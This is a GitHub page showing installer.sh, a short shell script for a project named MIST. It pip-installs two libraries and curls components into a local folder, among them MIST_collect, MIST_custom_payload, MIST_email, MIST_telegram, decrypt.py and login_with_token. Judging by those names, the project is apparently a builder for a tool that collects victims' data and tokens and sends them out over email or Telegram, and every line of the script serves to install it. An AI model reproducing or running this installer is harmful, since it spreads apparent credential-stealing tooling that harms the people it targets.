-
Notifications
You must be signed in to change notification settings - Fork 0
/
installer.sh
13 lines (13 loc) · 1005 Bytes
/
installer.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
pip install pyfiglet
pip install cryptography
mkdir ./MIST
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/MIST_collect > ./MIST/MIST_collect
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/MIST_custom_payload > ./MIST/MIST_custom_payload
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/MIST_email > ./MIST/MIST_email
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/MIST_encryption > ./MIST/MIST_encryption
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/MIST_telegram > ./MIST/MIST_telegram
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/build.py > ./MIST/build.py
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/decrypt.py > ./MIST/decrypt.py
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/launcher.py > ./MIST/launcher.py
curl https://raw.githubusercontent.com/gh0stKn1ght/MIST/main/src/login_with_token > ./MIST/login_with_token
echo Successfully installed MIST!